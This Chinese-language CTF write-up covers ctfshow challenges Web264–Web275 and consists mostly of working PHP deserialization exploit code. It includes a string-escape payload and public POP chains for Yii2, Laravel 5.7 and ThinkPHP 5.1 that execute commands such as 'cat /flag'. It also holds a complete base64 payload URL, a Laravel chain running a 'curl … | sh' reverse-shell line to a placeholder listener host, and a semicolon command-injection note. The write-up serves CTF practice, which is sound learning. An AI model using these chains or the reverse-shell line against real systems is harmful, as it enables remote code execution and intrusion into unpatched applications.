前言
最近在学 Python 的 re 模块，学烦了就继续打靶。
Web264
题目给的是 index.php 的源码；先分析它，再去访问 message.php，据此构造 exp。
index.php
接着访问message.php
与 262 类似，但 262 的方法在这里没法一步到位，
只能先经过 index.php 再到 message.php。
运用到字符串逃逸的知识
web264->字符串逃逸
我们构造一个exp本地测试一下
<?php
/**
 * Local stand-in for the challenge's message class, used only to produce a
 * serialized string for testing. The property order (from, msg, to, token)
 * must match the real class because it fixes the order in the serialized output.
 */
class message
{
    public $from;
    public $msg;
    public $to;
    // Value the challenge starts with; the escape overrides it with "admin"
    // by smuggling a second token property into the serialized string.
    public $token = 'user';

    /**
     * @param mixed $f sender, stored in $from
     * @param mixed $m message body, stored in $msg
     * @param mixed $t recipient, stored in $to (the injection point of the escape)
     */
    public function __construct($f, $m, $t)
    {
        [$this->from, $this->msg, $this->to] = [$f, $m, $t];
    }
}
// Probe: serialize a message and apply the same replacement the target applies.
$msg = new message("1", "2", 'fuck');
$serialized = serialize($msg);
$umsg = str_replace('fuck', 'loveU', $serialized);
// Before: O:7:"message":4:{s:4:"from";s:1:"1";s:3:"msg";s:1:"2";s:2:"to";s:4:"fuck";s:5:"token";s:4:"user";}
echo $serialized, "\n";
// After:  O:7:"message":4:{s:4:"from";s:1:"1";s:3:"msg";s:1:"2";s:2:"to";s:4:"loveU";s:5:"token";s:4:"user";}
// The length prefix still says s:4 while the value is now 5 bytes: that extra byte is what escapes.
echo $umsg;
?>
先把 fuck 替换成 loveU：序列化时写好的长度前缀 s:4 不会变，但值实际变成了 5 个字节，也就是每次替换都会多出 1 个字节。
反序列化时只按 s:4 读取 love，多出来的 U 就“逃逸”到了字符串之外。
接着让逃逸出来的内容正好是 ";s:5:"token";s:5:"admin";}：先闭合 to 的引号和分号，再补一个 token 属性并用 } 结束对象。
这段注入内容共 27 个字节（下面 exp 里的 s:135 = 27×4 + 27 也能印证），所以需要 27 个 fuck，每个贡献 1 个逃逸字节，位数必须严格对齐才能正常反序列化。
替换后 to 的 135 个字节正好全是 loveU，后面的 token=admin 被当作第 4 个属性解析，而原来尾部的 ";s:5:"token";s:4:"user";} 则被丢弃，user 就变成了 admin。
注意：逃逸字节数与注入内容长度差一个字节都会让 unserialize 失败，调试时可以在本地先对替换后的字符串做 unserialize 检查 token 的值。
按题目要求访问 message.php 时，把替换后的字符串先 base64_encode 再 urlencode（顺序与 exp 最后一行一致，否则 + / = 会被破坏），然后手动写入 cookie。
最终exp
<?php
/**
 * Stand-in for the challenge's message class, used to build the final payload.
 * No default for $token here: the value that reaches the target comes from the
 * forged property smuggled in through $to, not from this declaration.
 * Property order (from, msg, to, token) must match the real class.
 */
class message
{
    public $from;
    public $msg;
    public $to;
    public $token;

    /**
     * @param mixed $f sender, stored in $from
     * @param mixed $m message body, stored in $msg
     * @param mixed $t recipient, stored in $to (carries the padding and the injected tail)
     */
    public function __construct($f, $m, $t)
    {
        [$this->from, $this->msg, $this->to] = [$f, $m, $t];
    }
}
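// The injected tail: closes the "to" value, adds a forged token property and
// closes the object. Whatever follows it in the original string is left over
// and ignored by unserialize().
$tail = '";s:5:"token";s:5:"admin";}';
// The target runs str_replace('fuck', 'loveU', ...) on the serialized string:
// each hit adds one byte while the s:N length prefix of "to" is unchanged, so
// the number of hits must equal strlen($tail) (27 here). One more or one less
// and unserialize() fails, so derive the padding from the tail instead of
// counting by hand.
$pad = str_repeat('fuck', strlen($tail));
$msg = new message("1", "2", $pad . $tail);
$p = serialize($msg);
$umsg = str_replace('fuck', 'loveU', $p);
// $p:    O:7:"message":4:{s:4:"from";s:1:"1";s:3:"msg";s:1:"2";s:2:"to";s:135:"fuckfuck...fuck";s:5:"token";s:5:"admin";}";s:5:"token";s:4:"user";}
// $umsg: O:7:"message":4:{s:4:"from";s:1:"1";s:3:"msg";s:1:"2";s:2:"to";s:135:"loveUloveU...loveU";s:5:"token";s:5:"admin";}";s:5:"token";s:4:"user";}
print_r($p);
echo "\n";
// Verify locally against the *replaced* string (the one the target actually
// unserializes); the original check deserialized $p, which never exercises the escape.
$check = unserialize($umsg);
print_r($check);
echo "\n";
if (!is_object($check) || $check->token !== 'admin') {
    fwrite(STDERR, "escape did not line up: " . var_export(is_object($check) ? $check->token : $check, true) . "\n");
}
// Cookie value: base64 first, then urlencode so '+', '/' and '=' survive transport.
echo urlencode(base64_encode($umsg));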
//?>
web265
分析一波
mt_rand 是不是很熟悉？在爆破题里遇到过，这里它用来生成随机数覆盖 token（注意 mt_rand 本身不是密码学安全的随机数，但这道题不需要预测它）。
我们只能控制传入的一个值，token 被服务端重新赋值后二者就不相等了。所以要用 PHP 的引用（类似 C 里的指针）：
用 & 让 password 指向 token，serialize 会把 password 输出成 R:2;，unserialize 后两者仍指向同一个值，token 之后被改成什么都无所谓，login() 里的 === 恒成立。
exp:
<?php
/**
 * Local copy of the challenge class, used only to emit the serialized payload.
 *
 * The constructor binds $password to $token by reference, so serialize()
 * emits `R:2;` for password instead of a value. After unserialize() the two
 * properties alias the same zval, which is why login() keeps returning true
 * even if the target rewrites $token afterwards (as the write-up describes).
 */
class ctfshowAdmin
{
    public $token;
    public $password;

    /**
     * @param mixed $t initial token value
     * @param mixed $p ignored: password is aliased to token instead of being set
     */
    public function __construct($t, $p)
    {
        // Bind first, then assign: the reference, not the value, is the point.
        $this->password = &$this->token;
        $this->token = $t;
    }

    /** Strict comparison of two aliased properties: always true. */
    public function login()
    {
        return $this->token === $this->password;
    }
}
// Emit the payload; the reference shows up as R:2; in the output.
$p = new ctfshowAdmin('1', '1');
echo serialize($p);
?>
Web266
目标是不触发报错、让对象正常走到销毁（__destruct）即可。
过滤用的正则没有加 /i 修饰符，是大小写敏感的；而 PHP 的类名不区分大小写，所以把序列化串里的类名改一下大小写（例如 ctfshow → Ctfshow）就能绕过过滤，反序列化仍然成功。
exp:
<?php
/**
 * Stand-in for the challenge's ctfshow class. Property values are irrelevant
 * to the chain; only the class name and the two property names matter.
 * Remember to change the case of the class name in the emitted string before
 * sending it, as described above.
 */
class ctfshow {
    public $username = 'xxxxxx';
    public $password = 'xxxxxx';
}
// Print the serialized object (print_r on a string is a plain echo).
$p = new ctfshow();
echo serialize($p);
?>
Web267
登录界面
尝试弱密码登录 admin->admin
登录之后查看about
Yii2 框架。这是 2020 年公开的反序列化 CVE（BatchQueryResult::__destruct 起手的链，一般指 CVE-2020-15148，Yii2 < 2.0.38），线上资产大多已更新、历史遗留的也少，我没有单独复现，直接套了别人的 POC：
https://blog.csdn.net/weixin_44576725/article/details/123986819
根据
源代码中的提示
发现页面提示在/backdoor/shell里
/backdoor/shell 对 GET 参数 code 做 base64 解码后直接 unserialize（见下面的 payload）。
因为是公开漏洞，这里直接用别人的反序列化 pop 链，让咱写咱也不会呀（
pop 链要点：IndexAction 里 checkAccess 会被当作可调用函数、id 作为它的参数去执行（效果等同 call_user_func($checkAccess, $id)）。system 这类函数在此处没有回显，用 passthru 代替（之前我们也见过）。
$this->checkAccess = 'passthru'; 要执行的函数
$this->id = 'cat /flag'; 传给该函数的参数，即具体命令
<?php
namespace yii\db {
    /**
     * Chain entry. Per the public analysis the real yii\db\BatchQueryResult
     * has a __destruct() that works on $_dataReader, so the DbSession planted
     * here is reached when the unserialized object is garbage-collected.
     * The property is private, so it serializes under the mangled name
     * "\0yii\db\BatchQueryResult\0_dataReader" (visible in the payload below).
     */
    class BatchQueryResult
    {
        private $_dataReader;

        public function __construct()
        {
            $this->_dataReader = new \yii\web\DbSession();
        }
    }
}
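namespace yii\web {
    /**
     * Stand-in for yii\web\DbSession. Per the public analysis the real class
     * invokes $writeCallback on its write path, so planting [IndexAction, 'run']
     * hands control to IndexAction::run() with our checkAccess/id.
     */
    class DbSession
    {
        // Declared explicitly: creating it dynamically is deprecated since PHP 8.2
        // and, with display_errors on, the E_DEPRECATED notice would be printed in
        // front of the base64 payload. The serialized form is unchanged
        // (public property, plain name "writeCallback").
        public $writeCallback;

        public function __construct()
        {
            $action = new \yii\rest\IndexAction();
            $this->writeCallback = [$action, 'run'];
        }
    }
}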
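namespace yii\rest {
    /**
     * Stand-in for yii\rest\IndexAction. Per the public analysis (and the
     * write-up's own note) run() treats $checkAccess as a callable and passes
     * $id to it: checkAccess = PHP function, id = its single argument.
     */
    class IndexAction
    {
        // Declared explicitly: dynamic properties are deprecated since PHP 8.2
        // (the notice would pollute the echoed payload). Declaration order fixes
        // the serialized order: checkAccess first, then id.
        public $checkAccess;
        public $id;

        public function __construct()
        {
            // passthru() writes the command output straight to the response;
            // the write-up notes system() gave no visible output here.
            $this->checkAccess = 'passthru';
            $this->id = 'cat /flag';
        }
    }
}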
namespace {
    // The target's /backdoor/shell base64-decodes the `code` GET parameter and
    // unserializes it (see the payload URL below), so emit the chain in that form.
    $chain = new \yii\db\BatchQueryResult();
    echo base64_encode(serialize($chain));
}
?>
payload:
http://3974edc7-81bd-4cfa-975d-47a6608d7d2c.challenge.ctf.show/index.php?r=backdoor/shell&code=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNzoieWlpXHdlYlxEYlNlc3Npb24iOjE6e3M6MTM6IndyaXRlQ2FsbGJhY2siO2E6Mjp7aTowO086MjA6InlpaVxyZXN0XEluZGV4QWN0aW9uIjoyOntzOjExOiJjaGVja0FjY2VzcyI7czo4OiJwYXNzdGhydSI7czoyOiJpZCI7czo5OiJjYXQgL2ZsYWciO31pOjE7czozOiJydW4iO319fQ==
Web268
shell_exec 本身没有回显，所以分两步：先用 ls / | tee 1.txt 把目录列表写到文件里查清 flag 位置，再把 flag cp 到当前目录的 3.txt 后通过浏览器读取。
最终pop链
<?php
namespace yii\rest{
    /**
     * Stand-in for yii\rest\CreateAction: same gadget shape as IndexAction,
     * run() invokes $checkAccess with $id as its argument.
     */
    class CreateAction
    {
        public $checkAccess;
        public $id;

        public function __construct()
        {
            // Staged use in the write-up: a 'phpinfo' / '1' pair as a probe, then
            // shell_exec('ls / | tee 1.txt') to locate the flag, and finally the copy
            // below. shell_exec() returns output instead of printing it, hence the
            // tee/cp to files that can be fetched over HTTP.
            [$this->checkAccess, $this->id] = ['shell_exec', 'cp /flags 3.txt'];
        }
    }
}
namespace Faker{
    /**
     * Stand-in for Faker\Generator. Presumably the real class's __call() looks
     * up the called method name in $formatters and invokes the callable stored
     * there; the key therefore has to be "isRunning", the method RunProcess
     * calls on every entry of $processes when it is destroyed.
     */
    class Generator
    {
        protected $formatters;

        public function __construct()
        {
            $this->formatters = [
                'isRunning' => [new \yii\rest\CreateAction(), 'run'],
            ];
        }
    }
}
// poc2
namespace Codeception\Extension{
    /**
     * Chain entry for Codeception's RunProcess: per the public analysis its
     * __destruct() walks $processes calling isRunning() on each entry, which
     * is where the Faker\Generator stand-in takes over. Private, so the
     * property serializes as "\0Codeception\Extension\RunProcess\0processes".
     */
    class RunProcess
    {
        private $processes;

        public function __construct()
        {
            $this->processes = [];
            $this->processes[] = new \Faker\Generator();
        }
    }
}
namespace{
    // Print the base64 form of the chain for the target's `code` parameter.
    $chain = new Codeception\Extension\RunProcess();
    echo base64_encode(serialize($chain));
}
?>
Web269-Web270
与267到这的大体一样均为yii漏洞框架 flag的名字不一样 这里省略了
Web271-Web273
这里的黄色内容应该是提示。
Laravel v5.7 的反序列化漏洞（PendingCommand::__destruct 链，2019 年前后公开，一般指 CVE-2019-9081），网上有公开 POC。
我们复现一下反序列化链子：
<?php
namespace Illuminate\Foundation\Testing {
    /**
     * Stand-in for Illuminate\Foundation\Testing\PendingCommand.
     *
     * Only the property names, visibility and order matter: they decide the
     * serialized form that the target's unserialize() maps onto the real class.
     * Per the public analysis, destroying the real object ends up calling
     * $command with $parameters, so those two carry the PHP function and its
     * argument list.
     */
    class PendingCommand
    {
        public $test;
        protected $app;
        protected $command;
        protected $parameters;

        /**
         * @param object $test       object for the public `test` slot. The original
         *                           comment names Illuminate\Auth\GenericUser, but the
         *                           exp below actually passes Faker\DefaultGenerator.
         * @param object $app        container stand-in (Illuminate\Foundation\Application)
         * @param string $command    PHP function to call, e.g. 'system'
         * @param array  $parameters arguments for that function, e.g. ['id']
         */
        public function __construct($test, $app, $command, $parameters)
        {
            foreach (compact('test', 'app', 'command', 'parameters') as $name => $value) {
                $this->$name = $value;
            }
        }
    }
}
namespace Faker {
    /**
     * Stand-in for Faker\DefaultGenerator: a harmless object whose every
     * property access / method call yields $default, used to fill the `test`
     * slot of PendingCommand without triggering anything of its own.
     */
    class DefaultGenerator
    {
        protected $default;

        /** @param mixed $default value the real class hands back for any access */
        public function __construct($default = null)
        {
            $this->default = $default;
        }
    }
}
namespace Illuminate\Foundation {
    /**
     * Stand-in for the Laravel container. The chain resolves the
     * "Illuminate\Contracts\Console\Kernel" binding from $instances, so that
     * single key is pre-filled with whatever the caller passes (the exp nests
     * a second Application there).
     */
    class Application
    {
        protected $instances = [];

        /** @param mixed $instances value stored under the Kernel contract key */
        public function __construct($instances = [])
        {
            $this->instances = ['Illuminate\Contracts\Console\Kernel' => $instances];
        }
    }
}
namespace {
    // Assemble the chain: the inner Application is planted as the
    // "Illuminate\Contracts\Console\Kernel" instance of the outer one.
    $defaultgenerator = new Faker\DefaultGenerator(["hello" => "world"]);
    $app = new Illuminate\Foundation\Application();
    $application = new Illuminate\Foundation\Application($app);
    // 'system' plus a curl | sh one-liner: replace your-shell.com / your-ip:6666
    // with a listener you control. Piping to sh is a full reverse shell; for a
    // plain CTF read-out a quieter argument such as 'cat /flag' works as well.
    $pendingcommand = new Illuminate\Foundation\Testing\PendingCommand(
        $defaultgenerator,
        $application,
        'system',
        ['curl https://your-shell.com/your-ip:6666 | sh']
    );
    // URL-encoded so the serialized string can go straight into the request.
    echo urlencode(serialize($pendingcommand));
}
Web274
好熟悉，也好老。
源码对 GET 参数 data 直接做 unserialize。
这是 ThinkPHP 5.1 的公开反序列化链（think\process\pipes\Windows::__destruct 起手，最终走到 Request 里由 filter 指定的函数），复现一下：
POC 链子
<?php
namespace think;
/**
 * Stand-in for think\Model (abstract, so it is only reached through Pivot).
 *
 * $append and $data share one attribute name ("lin"): $data maps it to the
 * Request object that finishes the chain. The ["calc.exe","calc"] values look
 * like leftovers from a Windows-host PoC; on this target the executed command
 * comes from the GET parameter named by Request::$config['var_ajax'].
 */
abstract class Model
{
    protected $append = [];
    // Private: serialized under the mangled name "\0think\Model\0data".
    private $data = [];

    public function __construct()
    {
        $name = 'lin';
        $this->append = [$name => ['calc.exe', 'calc']];
        $this->data   = [$name => new Request()];
    }
}
/**
 * Stand-in for think\Request.
 *
 * $filter is the PHP function the chain finally calls ("system");
 * $config['var_ajax'] names the GET parameter whose value becomes that
 * function's argument (so the command is sent as &lin=...). $hook routes
 * the "visible" hook to $this->isAjax, presumably the method that reads
 * that parameter in the real class.
 */
class Request
{
    protected $hook;
    protected $filter;
    protected $config;

    public function __construct()
    {
        $this->filter = 'system';                       // PHP function to run
        $this->config = ['var_ajax' => 'lin'];          // GET param carrying its argument
        $this->hook   = ['visible' => [$this, 'isAjax']];
    }
}
namespace think\process\pipes;
use think\model\concern\Conversion;
use think\model\Pivot;
/**
 * Chain entry. Per the public analysis the real think\process\pipes\Windows
 * has a __destruct() that walks $files, and the Pivot (Model) placed there
 * drives the rest of the chain when it is converted to a string. Private,
 * so the property serializes as "\0think\process\pipes\Windows\0files".
 */
class Windows
{
    private $files = [];

    public function __construct()
    {
        $this->files[] = new Pivot();
    }
}
namespace think\model;
use think\Model;
// Concrete subclass so the abstract Model constructor can run; it adds no
// state of its own, the serialized object is just Model's properties under
// the class name think\model\Pivot.
class Pivot extends Model {}
use think\process\pipes\Windows;

// Emit the payload for the `data` GET parameter; base64 keeps the NUL bytes of
// the mangled private property names intact in the URL.
$payload = serialize(new Windows());
echo base64_encode($payload);
?>
实际要执行的命令通过 GET 参数 lin 传入（对应 Request 里 config 的 var_ajax => 'lin'），例如 &lin=ls /。
发现 flag 在根目录，直接读取。
好
Web275
突破点在 system()。
当 evilfile 为 true 时，代码会把 filename 拼进 system() 的删除命令里执行，而 filename 可控且没有经过 escapeshellarg 之类的处理，用 ; 分隔就能在后面追加任意命令（命令注入）。
POST 都不用传，
直接拿 flag。